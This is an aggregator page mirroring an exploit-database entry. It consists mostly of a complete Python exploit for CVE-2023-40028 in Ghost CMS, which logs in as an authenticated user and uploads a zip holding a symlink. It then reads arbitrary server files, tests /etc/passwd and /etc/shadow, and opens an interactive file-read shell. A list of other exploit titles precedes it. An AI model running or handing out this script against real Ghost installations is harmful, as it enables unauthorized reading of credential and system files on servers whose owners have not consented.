惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
C
CXSECURITY Database RSS Feed - CXSecurity.com
L
LINUX DO - 热门话题
S
Secure Thoughts
TaoSecurity Blog
TaoSecurity Blog
Security Archives - TechRepublic
Security Archives - TechRepublic
T
Threat Research - Cisco Blogs
AI
AI
B
Blog RSS Feed
S
Schneier on Security
雷峰网
雷峰网
Schneier on Security
Schneier on Security
Help Net Security
Help Net Security
Cloudbric
Cloudbric
L
LINUX DO - 最新话题
罗磊的独立博客
有赞技术团队
有赞技术团队
Recent Commits to openclaw:main
Recent Commits to openclaw:main
Apple Machine Learning Research
Apple Machine Learning Research
P
Proofpoint News Feed
酷 壳 – CoolShell
酷 壳 – CoolShell
The Hacker News
The Hacker News
博客园 - Franky
Attack and Defense Labs
Attack and Defense Labs
The Cloudflare Blog
Webroot Blog
Webroot Blog
Last Week in AI
Last Week in AI
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
博客园 - 叶小钗
美团技术团队
L
Lohrmann on Cybersecurity
T
The Blog of Author Tim Ferriss
The Last Watchdog
The Last Watchdog
T
Troy Hunt's Blog
H
Hackread – Cybersecurity News, Data Breaches, AI and More
Vercel News
Vercel News
Know Your Adversary
Know Your Adversary
O
OpenAI News
博客园 - 【当耐特】
Hacker News - Newest:
Hacker News - Newest: "LLM"
C
Cybersecurity and Infrastructure Security Agency CISA
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
www.infosecurity-magazine.com
www.infosecurity-magazine.com
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
PCI Perspectives
PCI Perspectives
H
Heimdal Security Blog
I
InfoQ
GbyAI
GbyAI
T
Threatpost
C
Cisco Blogs

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
Ghost CMS 5.59.1 Arbitrary File Read
2025-08-28 · via The Exploit Database - CXSecurity.com

Ghost CMS 5.59.1 Arbitrary File Read

#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ # Exploit Title: Ghost CMS 5.59.1 - Arbitrary File Read # Date: 2023-09-20 # Exploit Author: ibrahimsql (https://github.com/ibrahmsql) # Vendor Homepage: https://ghost.org # Software Link: https://github.com/TryGhost/Ghost # Version: < 5.59.1 # Tested on: Ubuntu 20.04 LTS, Windows 10, macOS Big Sur # CVE: CVE-2023-40028 # Category: Web Application Security # CVSS Score: 6.5 (Medium) # Description: # Ghost CMS versions prior to 5.59.1 contain a vulnerability that allows authenticated users # to upload files that are symlinks. This can be exploited to perform arbitrary file reads # of any file on the host operating system. The vulnerability exists in the file upload # mechanism which improperly validates symlink files, allowing attackers to access files # outside the intended directory structure through symlink traversal. # Requirements: requests>=2.28.1, zipfile, tempfile # Usage Examples: # python3 CVE-2023-40028.py http://localhost:2368 admin@example.com password123 # python3 CVE-2023-40028.py https://ghost.example.com user@domain.com mypassword # Interactive Usage: # After running the script, you can use the interactive shell to read files: # file> /etc/passwd # file> /etc/shadow # file> /var/log/ghost/ghost.log # file> exit """ import requests import sys import os import tempfile import zipfile import random import string from typing import Optional class ExploitResult: def __init__(self): self.success = False self.file_content = "" self.status_code = 0 self.description = "Ghost CMS < 5.59.1 allows authenticated users to upload symlink files for arbitrary file read" self.severity = "Medium" class GhostArbitraryFileRead: def __init__(self, ghost_url: str, username: str, password: str, verbose: bool = True): self.ghost_url = ghost_url.rstrip('/') self.username = username self.password = password self.verbose = verbose self.session = requests.Session() self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'en-US,en;q=0.9' }) self.api_url = f"{self.ghost_url}/ghost/api/v3/admin" def authenticate(self) -> bool: """Authenticate with Ghost CMS admin panel""" login_data = { 'username': self.username, 'password': self.password } headers = { 'Origin': self.ghost_url, 'Accept-Version': 'v3.0', 'Content-Type': 'application/json' } try: response = self.session.post( f"{self.api_url}/session/", json=login_data, headers=headers, timeout=10 ) if response.status_code == 201: if self.verbose: print("[+] Successfully authenticated with Ghost CMS") return True else: if self.verbose: print(f"[-] Authentication failed: {response.status_code}") return False except requests.RequestException as e: if self.verbose: print(f"[-] Authentication error: {e}") return False def generate_random_name(self, length: int = 13) -> str: """Generate random string for image name""" return ''.join(random.choices(string.ascii_letters + string.digits, k=length)) def create_exploit_zip(self, target_file: str) -> Optional[str]: """Create exploit zip file with symlink""" try: # Create temporary directory temp_dir = tempfile.mkdtemp() exploit_dir = os.path.join(temp_dir, 'exploit') images_dir = os.path.join(exploit_dir, 'content', 'images', '2024') os.makedirs(images_dir, exist_ok=True) # Generate random image name image_name = f"{self.generate_random_name()}.png" symlink_path = os.path.join(images_dir, image_name) # Create symlink to target file os.symlink(target_file, symlink_path) # Create zip file zip_path = os.path.join(temp_dir, 'exploit.zip') with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zipf: for root, dirs, files in os.walk(exploit_dir): for file in files: file_path = os.path.join(root, file) arcname = os.path.relpath(file_path, temp_dir) zipf.write(file_path, arcname) return zip_path, image_name except Exception as e: if self.verbose: print(f"[-] Error creating exploit zip: {e}") return None, None def upload_exploit(self, zip_path: str) -> bool: """Upload exploit zip file to Ghost CMS""" try: headers = { 'X-Ghost-Version': '5.58', 'X-Requested-With': 'XMLHttpRequest', 'Origin': self.ghost_url, 'Referer': f"{self.ghost_url}/ghost/" } with open(zip_path, 'rb') as f: files = { 'importfile': ('exploit.zip', f, 'application/zip') } response = self.session.post( f"{self.api_url}/db", files=files, headers=headers, timeout=30 ) if response.status_code in [200, 201]: if self.verbose: print("[+] Exploit zip uploaded successfully") return True else: if self.verbose: print(f"[-] Upload failed: {response.status_code}") return False except requests.RequestException as e: if self.verbose: print(f"[-] Upload error: {e}") return False def read_file(self, target_file: str) -> ExploitResult: """Read arbitrary file using symlink upload""" result = ExploitResult() if not self.authenticate(): return result if self.verbose: print(f"[*] Attempting to read file: {target_file}") # Create exploit zip zip_path, image_name = self.create_exploit_zip(target_file) if not zip_path: return result try: # Upload exploit if self.upload_exploit(zip_path): # Try to access the symlinked file file_url = f"{self.ghost_url}/content/images/2024/{image_name}" response = self.session.get(file_url, timeout=10) if response.status_code == 200 and len(response.text) > 0: result.success = True result.file_content = response.text result.status_code = response.status_code if self.verbose: print(f"[+] Successfully read file: {target_file}") print(f"[+] File content length: {len(response.text)} bytes") else: if self.verbose: print(f"[-] Failed to read file: {response.status_code}") except Exception as e: if self.verbose: print(f"[-] Error during exploit: {e}") finally: # Cleanup try: if zip_path and os.path.exists(zip_path): os.remove(zip_path) temp_dir = os.path.dirname(zip_path) if zip_path else None if temp_dir and os.path.exists(temp_dir): import shutil shutil.rmtree(temp_dir) except: pass return result def interactive_shell(self): """Interactive shell for file reading""" print("\n=== CVE-2023-40028 Ghost CMS Arbitrary File Read Shell ===") print("Enter file paths to read (type 'exit' to quit)") while True: try: file_path = input("file> ").strip() if file_path.lower() == 'exit': print("Bye Bye!") break if not file_path: print("Please enter a file path") continue if ' ' in file_path: print("Please enter full file path without spaces") continue result = self.read_file(file_path) if result.success: print(f"\n--- Content of {file_path} ---") print(result.file_content) print("--- End of file ---\n") else: print(f"Failed to read file: {file_path}") except KeyboardInterrupt: print("\nExiting...") break except Exception as e: print(f"Error: {e}") def main(): if len(sys.argv) != 4: print("Usage: python3 CVE-2023-40028.py <ghost_url> <username> <password>") print("Example: python3 CVE-2023-40028.py http://localhost:2368 admin@example.com password123") return ghost_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] exploit = GhostArbitraryFileRead(ghost_url, username, password, verbose=True) # Test with common sensitive files test_files = [ "/etc/passwd", "/etc/shadow", "/etc/hosts", "/proc/version", "/var/log/ghost/ghost.log" ] print("\n=== CVE-2023-40028 Ghost CMS Arbitrary File Read Exploit ===") print(f"Target: {ghost_url}") print(f"Username: {username}") # Test authentication first if not exploit.authenticate(): print("[-] Authentication failed. Please check credentials.") return print("\n[*] Testing common sensitive files...") for test_file in test_files: result = exploit.read_file(test_file) if result.success: print(f"[+] Successfully read: {test_file}") print(f" Content preview: {result.file_content[:100]}...") else: print(f"[-] Failed to read: {test_file}") # Start interactive shell exploit.interactive_shell() if __name__ == "__main__": main()



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}